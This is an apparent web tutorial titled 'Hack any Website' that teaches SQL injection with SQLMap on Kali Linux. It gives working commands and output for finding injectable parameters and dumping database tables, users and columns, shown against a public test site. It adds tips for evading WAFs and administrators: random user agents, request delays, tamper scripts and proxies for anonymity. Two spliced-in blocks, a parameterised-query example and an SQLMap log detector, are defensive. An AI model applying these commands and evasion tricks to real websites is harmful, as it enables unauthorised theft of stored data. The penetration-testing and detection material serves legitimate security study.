
Hack any Website - SQLMap Tutorial on Kali Linux

Nearly 45.8% of websites on the internet are built on the WordPress content management system. WordPress uses a backend MySQL database to store the website's data, so hacking a WordPress website means gaining access to this database in an unauthorized way. A hacker who reaches the database without knowing its login credentials can execute any SQL command and expose the stored data to the public. SQLMap is one tool hackers use for this. In this SQLMap tutorial, we explain in depth how hackers use SQLMap on Kali Linux to hack any website.


This SQLMap tutorial is divided into the sections below. You can jump directly to any section you want.



What is Kali Linux?

Kali Linux is a Linux distribution much like Ubuntu, Parrot Linux or BlackArch, but it is built specifically for the convenience of ethical hackers and penetration testers.


Official Logo of Kali Linux

Kali Linux comes with many ethical hacking tools pre-bundled by default. The tools come preconfigured and ready to use. The complete list of built-in Kali tools can be found here.


What is SQLMap?

SQLMap is an open source tool used by ethical hackers and penetration testers to detect and exploit SQL Injection (SQLi) vulnerabilities.


Through a SQL Injection vulnerability, hackers can manipulate and dump the database contents, causing major reputational and financial loss to an organization. When a hacker gets access to the website's database, the website is said to be hacked.


For hackers and penetration testers, SQLMap is the go-to choice for working with SQLi vulnerabilities, because it takes you from detection to exploitation of a SQLi vulnerability without any other external tool. In addition, it comes preinstalled with Kali Linux.


How to install SQLMap on Kali Linux (if it's not there)?

On Kali Linux and other distros like Parrot Linux and BlackArch, SQLMap comes pre-installed. You can check whether it is installed using the command below -

sqlmap --version

If SQLMap is installed, this prints its version number; running sqlmap -h prints the SQLMap banner shown below, followed by the help text -


SQLMap Banner on Kali Linux

If you have removed the SQLMap that ships with Kali Linux, follow the steps below to install it afresh.

 

Installing the SQLMap prerequisite (If SQLMap is not installed)

Python3 is the only prerequisite for SQLMap. Check whether Python3 is already installed using the command below -

python3 --version

If the above command does not print a Python version, install Python using the steps below -

Steps to Install Python3

For Debian-based Linux such as Kali Linux, Ubuntu, Lubuntu and Kubuntu, use the command below to install Python3:

sudo apt install python3

On Red Hat-based Linux such as Fedora and CentOS, use the command below (yum on older CentOS releases) -

sudo dnf install python3
 

Installing the SQLMap Package

Step 1: Download the SQLMap

Download the SQLMap tarball from the official Git repository of SQLMap.

wget 'https://github.com/sqlmapproject/sqlmap/tarball/master' -O sqlmap.tar.gz

Step 2: Untar the SQLMap Tar file

Run the command below to extract the SQLMap package from the tarball.

tar -xvf sqlmap.tar.gz

Step 3: Running the SQLMap

Now move into the directory where you extracted SQLMap and run the command below to test whether it is installed properly -

python3 sqlmap.py -h

It should show the SQLMap banner as below. If you see it, SQLMap is installed properly on your Kali Linux instance -



SQLMap tutorial: Banner on Kali Linux

Steps to Hack any Website using SQLMap

Any website has a backend database that stores its data. Where there is a database there is SQL, and hence the chance of a SQL Injection vulnerability.


To hack a website with SQLMap, we first need to detect whether the website is vulnerable to SQL Injection. The good thing is that SQLMap itself helps us through this detection phase.


So, we will follow the 2 steps below to hack any website using SQLMap on Kali Linux -

  1. Check whether the website is vulnerable to SQL Injection (using SQLMap)

  2. Exploit the vulnerable endpoint to hack the website database (again using SQLMap)


In the next section, we look at these detection commands and enumeration commands in detail, with their syntax and examples.


SQLMap Tutorial: Kali Linux commands

Now that SQLMap is installed and running, let's proceed to the various SQLMap commands that can be run on Kali Linux.


SQLMap commands fall into 2 categories: detection commands, which help us detect the presence of a SQLi vulnerability, and enumeration commands, which help us exploit the detected SQLi vulnerability.


Let's look at them one by one. For this tutorial, we use the SQL Injection test site Acunetix Vulnweb.


Detection Commands Tutorial: SQLMap Kali Linux

Detection commands help detect a SQLi vulnerability in an application.


sqlmap -p : Specify which parameter to probe

The -p option specifies which of the available input parameters should be tested for SQLi.


sqlmap -u : Specify the target URL and the GET parameter

The -u option takes the target URL, and -p names the parameter to test. Running sqlmap -u with the test site's listproducts.php?cat=2 URL and -p cat injects SQLi payloads into the GET parameter named "cat". Below is the output of that command:

[18:56:54] [INFO] heuristic (basic) test shows that GET parameter 'cat' might be injectable (possible DBMS: 'MySQL')
[18:56:54] [INFO] heuristic (XSS) test shows that GET parameter 'cat' might be vulnerable to cross-site scripting (XSS) attacks
[18:56:54] [INFO] testing for SQL injection on GET parameter 'cat'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
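To show why SQLMap can flag a parameter like cat as injectable, and what closes the hole, here is an added example (not from the tutorial or from SQLMap) of the same product lookup done two ways. It uses sqlite3 with constructed product rows as a stand-in for the site's MySQL table: the concatenated query lets a boolean probe such as the ones SQLMap sends alter the result, while the validated, parameterised query does not.

```python
import sqlite3

# Constructed stand-in for the product table behind listproducts.php?cat=N.
ROWS = [(1, 1, "Lamp"), (2, 1, "Chair"), (3, 2, "Poster"), (4, 3, "Vase")]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", ROWS)
    return conn

def list_products_vulnerable(conn, cat):
    # The raw ?cat= value is pasted into the SQL text, so it can rewrite the WHERE clause.
    sql = "SELECT name FROM products WHERE cat = " + cat + " ORDER BY id"
    return [row[0] for row in conn.execute(sql)]

def list_products_hardened(conn, cat):
    # Reject anything that is not a plain integer, then bind it as a parameter:
    # the database receives the value separately from the query text.
    if not cat.isdigit():
        raise ValueError("cat must be a positive integer")
    sql = "SELECT name FROM products WHERE cat = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (int(cat),))]

def boolean_probe_differs(handler, conn):
    """Mimic SQLMap's boolean-based check: cat=2 with a true condition and with a
    false condition appended should give the same page unless input reaches SQL."""
    try:
        return handler(conn, "2 AND 1=1") != handler(conn, "2 AND 1=2")
    except ValueError:
        return False  # the hardened handler refused the payload outright
```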

sqlmap --data: Specify parameter in POST request

As with a GET request, you can specify which parameter of a POST request to test for SQL Injection. To send a POST request with a body, use the --data option.

The -p option is used exactly as for a GET request.


Example:

sqlmap -u "http://example.com/login" --data="username=test&password=test" -p username

sqlmap -r : Run SQLMap on a Burp Suite request saved in a file

With the -r flag, we can run SQLMap on a request already captured in a text file, or on a request captured by an external tool such as Postman.


This can also be a request captured by the Burp Suite interceptor. Below is an example of a request captured by Burp Suite:

GET /api/endpoint1.php HTTP/1.1
Host: test.app.com
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Save this HTTP request in a text file and feed it to SQLMap using the -r switch as below.


Example:

sqlmap -r burp-request.txt -p cat --dump

When to use the sqlmap -r command:

The -r option is useful when running SQLMap against any endpoint that requires cookie-based authentication.


With cookie-based authentication, the HTTP request must carry the cookie headers set by the target server. The server sets the cookie once the user is authenticated (for example after entering the correct user id and password). A request intercepted with Burp Suite already carries those cookie headers.


Use *: Test deeply nested parameters in JSON/XML payloads

Sometimes an API consumes a nested JSON object like the one below:

{
    "Boss" : "John",
    "Department" : "Finance",
    "Department id": 3,
    "employees":[
        {
            "name":"Shaun",
            "age": 30
        },
        {
            "name":"Paul",
            "age" : 27
        }
    ]
}

Now, to test the "age" field of the above JSON for SQL Injection, we use the "*" injection marker.


Again, for bigger JSON structures like this it is easier to store the request in a text file and feed the file in with the -r switch (as explained for the previous command). Mark the value to test with an asterisk, as in the tail of the request below:


.....
    "name":"Paul",
    "age" : 27*
}

Enumeration commands: SQLMap Kali Linux

Enumeration commands help enumerate the database through the detected SQLi endpoint. Let's see all the enumeration commands in action -


sqlmap --banner : Fingerprint the Database Management System

Use the --banner flag to dump the database banner, which helps us fingerprint the database management system.


Example:

python sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=2" -p cat --banner

Output:

[18:27:39] [INFO] the back-end DBMS is MySQL
[18:27:39] [INFO] fetching banner
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.1
banner: '8.0.22-0ubuntu0.20.04.2'

As you can see, we have successfully fingerprinted the database server and dumped its version, the underlying operating system and the DBMS type.


sqlmap --dump: Dumping all tables data

Once you have identified a vulnerable parameter with -p, use the --dump option to dump the data of all tables.


Example of --dump command -

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=2" -p cat --dump

Below is an output:



As you can see, SQLMap has itself enumerated the available database schemas and is now dumping each table one by one (the tables in the screenshot appear empty because they have no entries).


Dump specific pieces of data

Dumping all table data with --dump can take a long time (depending on the size). For penetration testers or ethical hackers, a simple POC that demonstrates some data leak is often enough to prove that the vulnerability is present and needs to be fixed with high priority.


Instead of dumping full table data, SQLMap can dump only the names of database tables, schemas, database users, roles and more. Let's look at these one by one.


sqlmap --tables: Dump names of database tables

Use the --tables switch.

Example:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=2" -p cat --tables

The above command lists only the table names, as below -


Once you know the table names, you can scan through the list and pick any table that holds very sensitive data such as session tokens, passwords or API keys.


However, sometimes tables are too large to dump. A later section shows how to speed that up.


sqlmap --users & sqlmap --roles: Dump names of database users and roles

Use the --users and --roles switches.

Example:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=2" -p cat --users --roles

Output:


As you can see, SQLMap has listed the database user names and then the role names, as instructed.


How to Speed up the Table dump in SQLMap?

Dumping a full table can be difficult, as a table may contain a huge number of rows across many columns.


Option 1: Dump only specific columns rather than all columns

You can speed up the dump by dumping only specific columns.


This way you skip unimportant columns such as timestamp columns (which contain little sensitive data).


For a specific-column dump, first find the names of all columns in a table using the --columns flag. Supply the table name with the -T flag.


Example:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=2" -p cat -T artists --columns

Output:

[16:56:25] [INFO] fetching current database
[16:56:25] [INFO] fetching columns for table 'artists' in database 'acuart'
Database: acuart
Table: artists
[3 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| adesc     | text        |
| aname     | varchar(50) |
| artist_id | int         |
+-----------+-------------+

As seen above, SQLMap has dumped the column names of the 'artists' table. Now you can dump data from specific columns only, as below -

python sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=2" -p cat -T artists -C aname --dump

In the above command, we chose to dump column "aname" of table "artists". Here is how SQLMap shows the output -

[17:06:56] [INFO] fetching entries of column(s) 'aname' for table 'artists' in database 'acuart'
Database: acuart
Table: artists
[3 entries]
+---------+
| aname   |
+---------+
| r4w8173 |
| Blad3   |
| lyzae   |
+---------+

This way we speed up the process by dumping only the sensitive pieces of data needed for a POC.


Option 2: Run SQLMap Multithreaded

With the --threads switch you specify how many concurrent HTTP requests SQLMap should fire.


The max limit for this parameter is 10.


Especially in time-based SQL Injection, where dumping data can take a huge amount of time, the --threads option helps speed up the process.


Let's see the use of --threads in action -

python sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=2" -p cat --technique=T --dump --threads=10

In the above command, we deliberately asked SQLMap to use the time-based SQL Injection technique only and to dump the data using 10 concurrent threads.


Here is how the SQLMap output looks -


As you can see, with the multithreaded approach SQLMap first finds the length of the query output and then assigns separate threads to different characters of that output.


SQLMap Cheatsheet: Bypass WAF while using SQLMap


Website administrators are getting more security conscious day by day. Various plug-and-play web security solutions exist that make life easier for website admins. One such widely used solution is the Web Application Firewall (WAF).


A Web Application Firewall (itself a web application that acts as a reverse proxy) inspects all incoming traffic to a website and decides which requests come from genuine users and which are malicious hacking attempts.


Examples of such WAFs are Cloudflare, Akamai and AWS WAF.


When a WAF is in place, SQLMap gets stuck and cannot proceed: its SQL Injection payloads are intercepted first by the WAF, which immediately flags the requests as malicious and does not let them reach the actual web application.


Fortunately, SQLMap has inbuilt support for dealing with almost 80 different WAFs, enabled by default. SQLMap deliberately sends a malicious HTTP request just to detect which WAF is in use. After detecting the WAF type, it applies the necessary request alterations to sneak the SQLi payloads through.


The --skip-waf flag

In case you do not want to use SQLMap's inbuilt WAF handling, you can disable it with the --skip-waf option.


Example:

python sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=2" -p cat --technique=T --skip-waf
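As an added example (not from the tutorial or from SQLMap) of what a WAF or a log reviewer keys on, the script below scans constructed nginx-style access-log lines for the traces the commands in this tutorial leave: SQLMap's default User-Agent (which --random-agent replaces), the boolean, time-based and UNION payload shapes, a 500 response to the heuristic quote probe, and the request burst produced by --threads. The IP addresses and the version string in the sample lines are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed nginx-style access-log lines (not real traffic): one browsing user, one
# SQLMap run with its default User-Agent, one run hidden behind --random-agent.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2024:18:56:50 +0000] "GET /listproducts.php?cat=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/121.0"
198.51.100.9 - - [10/Jan/2024:18:56:54 +0000] "GET /listproducts.php?cat=2%27%29 HTTP/1.1" 500 812 "-" "sqlmap/1.7.12#stable (https://sqlmap.org)"
198.51.100.9 - - [10/Jan/2024:18:56:54 +0000] "GET /listproducts.php?cat=2%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/1.7.12#stable (https://sqlmap.org)"
192.0.2.77 - - [10/Jan/2024:19:02:11 +0000] "GET /listproducts.php?cat=2%20AND%20SLEEP%285%29 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0.0.0"
192.0.2.77 - - [10/Jan/2024:19:02:11 +0000] "GET /listproducts.php?cat=2%20UNION%20ALL%20SELECT%20NULL%2CNULL HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0.0.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \d+ "[^"]*" "([^"]*)"')

# Payload shapes left by the detection and enumeration phases described above.
PAYLOAD_PATTERNS = {
    "boolean": re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "time": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
    "union": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
}

def classify(line):
    """Return the indicator names found in one access-log line (empty if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    _ip, _ts, _method, path, status, ua = m.groups()
    hits = []
    if ua.startswith("sqlmap/"):  # default User-Agent; gone when --random-agent is used
        hits.append("sqlmap-user-agent")
    query = unquote_plus(path.partition("?")[2])
    for name, pattern in PAYLOAD_PATTERNS.items():
        if pattern.search(query):
            hits.append(name + "-payload")
    if status == "500" and query.rstrip().endswith(("'", ")", '"')):
        hits.append("heuristic-syntax-error")  # quote/paren probe broke the query
    return hits

def scan(log_text):
    """Per-client summary: indicator counts plus the most requests seen in one second."""
    per_ip, per_second = {}, Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        per_second[(m.group(1), m.group(2))] += 1
        for hit in classify(line):
            per_ip.setdefault(m.group(1), Counter())[hit] += 1
    return {ip: {"indicators": dict(hits),
                 "peak_rps": max(n for (i, _), n in per_second.items() if i == ip)}
            for ip, hits in per_ip.items()}
```

Clients that never trip an indicator are left out of the summary; a high peak_rps on a flagged client is the footprint of --threads, which --delay is meant to smooth out.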

SQLMap Cheatsheet: Tips and Tricks

Here are some tips from BUZZ experts to make full use of SQLMap with ease.


Use Custom User-Agent

SQLMap lets you change the User-Agent; the --random-agent option picks a random browser User-Agent to mimic various browsers.


Delay Requests

Use --delay to set a delay between requests, reducing the chance of detection by a WAF or website admins.


Tamper Scripts

Explore tamper scripts (--tamper) to modify requests and evade WAFs. Though SQLMap's inbuilt WAF bypass mechanism helps, it is not foolproof; custom tamper scripts help in such cases.


Proxy Support

Route SQLMap's traffic through a proxy (--proxy) for anonymized testing.


Update Regularly

New SQLMap versions with many improvements come out regularly, so it is good to stay up to date (use the --update flag).


Make use of --risk and --level

The default values of the --risk and --level options keep the load on web servers bearable. This also means some SQLi-vulnerable endpoints might slip through at this load. You can raise the risk and level values to detect such corner-case endpoints.


Most Important: Take Permission from Site Owner

It is illegal to use SQLMap on any website without the permission of the site owner. SQLMap is a tool for penetration testers and ethical hackers, and is meant for ethical use.


Any use of SQLMap without the knowledge of the website owner is considered illegal. SQLMap itself warns you about this every time, as highlighted below:

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.7.12.7#dev}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Conclusion

Kali Linux has plenty of tools for ethical hackers, but SQLMap is one tool that creates a huge impact because it is built around SQL Injection vulnerabilities. You can hack any website by hacking its database using SQLMap. It is a free tool, widely acknowledged by the InfoSec community.


With great power comes great responsibility. Use SQLMap with the permission of the site owner and, of course, for testing purposes only.

